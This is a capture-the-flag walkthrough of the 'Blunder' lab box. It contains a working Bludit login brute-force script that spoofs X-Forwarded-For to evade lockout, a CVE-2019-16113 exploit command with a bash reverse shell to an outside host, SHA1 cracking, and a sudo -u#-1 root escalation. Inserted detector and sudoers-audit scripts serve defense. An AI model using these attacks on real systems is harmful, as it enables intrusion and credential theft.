Blunder is a Linux box with IP address 10.10.10.191. Let's start with an nmap scan and some enumeration.

#nmap

Nmap scan report for 10.10.10.191
Host is up (0.32s latency).
Not shown: 998 filtered ports
PORT   STATE  SERVICE VERSION
21/tcp closed ftp
80/tcp open   http?
|_http-generator: Blunder
| http-methods:
|_  Supported Methods: OPTIONS
|_http-title: Blunder | A blunder of interesting facts

#dirsearch

python3 dirsearch.py -u http://10.10.10.191 -e *
Target: http://10.10.10.191
[11:44:57] Starting
[11:45:01] 200 -    7KB - /%3f/
[11:45:10] 200 -  563B  - /.gitignore
[11:45:30] 200 -    7KB - /0
[11:45:56] 200 -    3KB - /about
[11:46:04] 301 -    0B  - /admin  ->  http://10.10.10.191/admin/
[11:46:08] 200 -    2KB - /admin/
[11:46:08] 200 -    2KB - /admin/.config

#wfuzz

wfuzz -c -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt --hc 404,403 -u "http://10.10.10.191/FUZZ.txt"
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************
Target: http://10.10.10.191/FUZZ.txt
Total requests: 4658
===================================================================
ID           Response   Lines    Word     Chars       Payload                                                    
===================================================================
 
000003519:   200        1 L      4 W      22 Ch    "robots"                                                    
000004125:   200        4 L      23 W     118 Ch      "todo"                                                     

Dig into todo.txt

-Update the CMS
-Turn off FTP - DONE
-Remove old users - DONE
-Inform fergus that the new blog needs images - PENDING

So we have the username fergus for the admin panel and a hint that the CMS is Bludit. Password guessing didn't work, so the usual next step is to build a wordlist from the site with cewl and brute-force the login with it.

#cewl

cewl -w passwords.txt -d 10 -m 1 http://10.10.10.191

Tried different brute-force tools, but none worked because of Bludit's brute-force mitigation; the bypass is described at https://rastating.github.io/bludit-brute-force-mitigation-bypass/

bruteforce.py

    #!/usr/bin/env python3
    from __future__ import print_function
    import re
    import requests


    def open_ressources(file_path):
        # Read the wordlist and strip the trailing newline from each entry
        return [item.replace("\n", "") for item in open(file_path).readlines()]


    host = 'http://10.10.10.191'
    login_url = host + '/admin/login'
    username = 'fergus'
    wordlist = open_ressources('/home/kali/passwords.txt')

    for password in wordlist:
        # Fresh session per attempt; the login form carries a CSRF token that must be echoed back
        session = requests.Session()
        login_page = session.get(login_url)
        csrf_token = re.search('input.+?name="tokenCSRF".+?value="(.+?)"', login_page.text).group(1)

        print('[*] Trying: {p}'.format(p = password))

        # Bludit keys its lockout counter on X-Forwarded-For, so a changing value defeats it
        headers = {
            'X-Forwarded-For': password,
            'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36',
            'Referer': login_url
        }

        data = {
            'tokenCSRF': csrf_token,
            'username': username,
            'password': password,
            'save': ''
        }

        login_result = session.post(login_url, headers = headers, data = data, allow_redirects = False)

        # A successful login answers with a redirect to the dashboard
        if 'location' in login_result.headers:
            if '/admin/dashboard' in login_result.headers['location']:
                print()
                print('SUCCESS: Password found!')
                print('Use {u}:{p} to login.'.format(u = username, p = password))
                print()
                break
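The mitigation bypass above works because the application trusts X-Forwarded-For from any client. From the defender's side this is easy to spot in the web server's own logs, where the real socket address is recorded next to whatever the client put in the header. The following script is an added example, not part of this writeup or of Bludit; it assumes a combined-style access log with the X-Forwarded-For value appended as one extra quoted field, and the log lines are constructed for the demo. It flags a source address when the header values are not IP addresses at all, or when one source rotates through many different header values while hitting the login endpoint.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sample log lines (not taken from the box). Format assumed:
# combined log with the X-Forwarded-For header value as a trailing quoted field.
SAMPLE_LOG = """\
10.10.14.245 - - [21/Jun/2020:11:50:01 +0000] "POST /admin/login HTTP/1.1" 200 2311 "summer2020"
10.10.14.245 - - [21/Jun/2020:11:50:01 +0000] "POST /admin/login HTTP/1.1" 200 2311 "letmein"
10.10.14.245 - - [21/Jun/2020:11:50:02 +0000] "POST /admin/login HTTP/1.1" 200 2311 "welcome1"
10.10.14.245 - - [21/Jun/2020:11:50:02 +0000] "POST /admin/login HTTP/1.1" 200 2311 "blog2020"
10.10.14.245 - - [21/Jun/2020:11:50:03 +0000] "POST /admin/login HTTP/1.1" 200 2311 "facts"
10.10.14.245 - - [21/Jun/2020:11:50:03 +0000] "GET /admin/dashboard HTTP/1.1" 200 5120 "-"
192.168.1.20 - - [21/Jun/2020:11:51:00 +0000] "POST /admin/login HTTP/1.1" 200 2311 "-"
192.168.1.20 - - [21/Jun/2020:11:51:05 +0000] "POST /admin/login HTTP/1.1" 200 2311 "-"
172.16.0.5 - - [21/Jun/2020:11:52:00 +0000] "POST /admin/login HTTP/1.1" 200 2311 "203.0.113.7"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<xff>[^"]*)"$'
)


def parse_line(line):
    """Split one access-log line into its fields, or None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def is_ip(value):
    """True if the header value is a syntactically valid IPv4/IPv6 address."""
    try:
        ipaddress.ip_address(value.strip())
        return True
    except ValueError:
        return False


def analyse(log_text, login_path='/admin/login', distinct_threshold=3):
    """Return {source_ip: finding} for sources whose login POSTs carry suspicious XFF values.

    Two indicators are used: any XFF value that is not an IP address, and a
    number of distinct XFF values per real source at or above distinct_threshold.
    """
    distinct_xff = defaultdict(set)   # source ip -> set of XFF values seen
    non_ip_xff = defaultdict(list)    # source ip -> XFF values that are not addresses
    attempts = defaultdict(int)       # source ip -> login POST count

    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec['method'] != 'POST' or rec['path'] != login_path:
            continue
        src = rec['src']
        attempts[src] += 1
        xff = rec['xff']
        if xff == '-':                # header absent: nothing to judge
            continue
        distinct_xff[src].add(xff)
        if not is_ip(xff):
            non_ip_xff[src].append(xff)

    findings = {}
    for src, n in attempts.items():
        reasons = []
        if non_ip_xff[src]:
            reasons.append('non-ip-xff')
        if len(distinct_xff[src]) >= distinct_threshold:
            reasons.append('rotating-xff')
        if reasons:
            findings[src] = {
                'attempts': n,
                'distinct_xff': len(distinct_xff[src]),
                'reasons': reasons,
            }
    return findings


if __name__ == '__main__':
    for src, info in analyse(SAMPLE_LOG).items():
        print(src, info)
```

Only 10.10.14.245 is reported: five login POSTs, five different header values, none of them an address. The proxied request from 172.16.0.5 with a single valid forwarded address is left alone, and the lines without the header are ignored. The underlying fix is the same in any application: derive the rate-limit key from the socket peer address, and honour X-Forwarded-For only when the peer is a proxy you control.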

That gives fergus:RolandDeschain. Log into the Bludit CMS, check for CVEs affecting Bludit, and you land on CVE-2019-16113.

https://github.com/cybervaca/CVE-2019-16113 // this exploit is written in Python; alternatively you can go with the Metasploit framework: https://www.exploit-db.com/exploits/47699

I used the exploit from GitHub.

python3 CVE-2019-16113.py -u http://10.10.10.191 -user fergus -pass RolandDeschain -c "bash -c 'bash -i >& /dev/tcp/10.10.14.245/1337 0>&1'"

Listen on the chosen port, in this case 1337:

nc -lvp 1337

After getting the reverse shell, dig into the files under /var/www/bludit-3.10.0a/bl-content/databases/; in this directory there is a users.php file.

It contains a hash value. First identify it (it's SHA1), then try to crack it online at https://md5decrypt.net/en/Sha1/

faca404fd5c0a31cf1897b823c695c85cffeb98d : Password120

#user

[email protected]:/var/www/bludit-3.9.2/bl-content/tmp$ su hugo
su hugo
Password: Password120
cat user.txt
13270375df398ae7fb7f28d27117d7aa

Now try the simple route to root: sudo -l shows the entry (ALL, !root) /bin/bash.

A quick Google search for (ALL, !root) /bin/bash leads to https://www.exploit-db.com/exploits/47502
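The root step hinges on a sudoers rule that grants a command as ALL and then tries to subtract root with `!`. Negated Runas lists are a deny-list on top of an allow-everything grant, and the sudoers documentation recommends listing the permitted target users explicitly instead. The script below is an added example, not part of this writeup or of the sudo project; it parses a constructed sudoers excerpt (the `hugo` line mirrors the shape of the rule on the box, the other lines are invented) and reports any user specification whose Runas list combines ALL with a `!` negation, which is the pattern a configuration audit should flag.

```python
import re

# Constructed sudoers excerpt for the demo (not copied from the box).
SAMPLE_SUDOERS = """\
# User privilege specification
root    ALL=(ALL:ALL) ALL
hugo    ALL=(ALL, !root) /bin/bash
deploy  ALL=(www-data) NOPASSWD: /usr/bin/systemctl restart nginx
%admin  ALL=(ALL) ALL
"""

# user  hosts = (runas_users[:runas_groups]) commands
# Simplified: aliases, #include directives and numeric #uid forms are not handled.
SPEC_RE = re.compile(
    r'^(?P<user>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\))?\s*(?P<cmds>.+)$'
)

DIRECTIVES = ('Defaults', 'User_Alias', 'Runas_Alias', 'Host_Alias', 'Cmnd_Alias')


def parse_user_specs(text):
    """Return the user specification lines of a sudoers file as dicts."""
    specs = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()      # drop comments
        if not line or line.startswith(DIRECTIVES):
            continue
        m = SPEC_RE.match(line)
        if m:
            specs.append(m.groupdict())
    return specs


def runas_users(spec):
    """The Runas user list of a spec as a list of stripped tokens (group part dropped)."""
    runas = spec.get('runas') or ''
    users = runas.split(':', 1)[0]
    return [u.strip() for u in users.split(',') if u.strip()]


def negated_runas(spec):
    """Return the negated entries in the Runas user list, e.g. ['!root']."""
    return [u for u in runas_users(spec) if u.startswith('!')]


def audit(text):
    """Flag specs that grant Runas ALL and then carve users out of it with '!'."""
    findings = []
    for spec in parse_user_specs(text):
        neg = negated_runas(spec)
        if neg and 'ALL' in runas_users(spec):
            findings.append({
                'user': spec['user'],
                'runas': spec['runas'],
                'negated': neg,
                'cmds': spec['cmds'].strip(),
            })
    return findings


if __name__ == '__main__':
    for f in audit(SAMPLE_SUDOERS):
        print('{user}: ({runas}) {cmds}  <- negated Runas {negated}; '
              'replace with an explicit list of target users'.format(**f))
```

The audit reports only the `hugo` rule. The practical remediation is to rewrite such a rule as an allow-list of the accounts the user may actually run the command as, and to keep sudo patched; a rule built on `!root` gives no guarantee on its own.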

#root

$ sudo -u#-1 /bin/bash
sudo -u#-1 /bin/bash
Password: Password120
[email protected]:/root# cat root.txt
cat root.txt
1116025955c775dd9462ff1f6f4bdd68

Hope you Enjoy it 😀
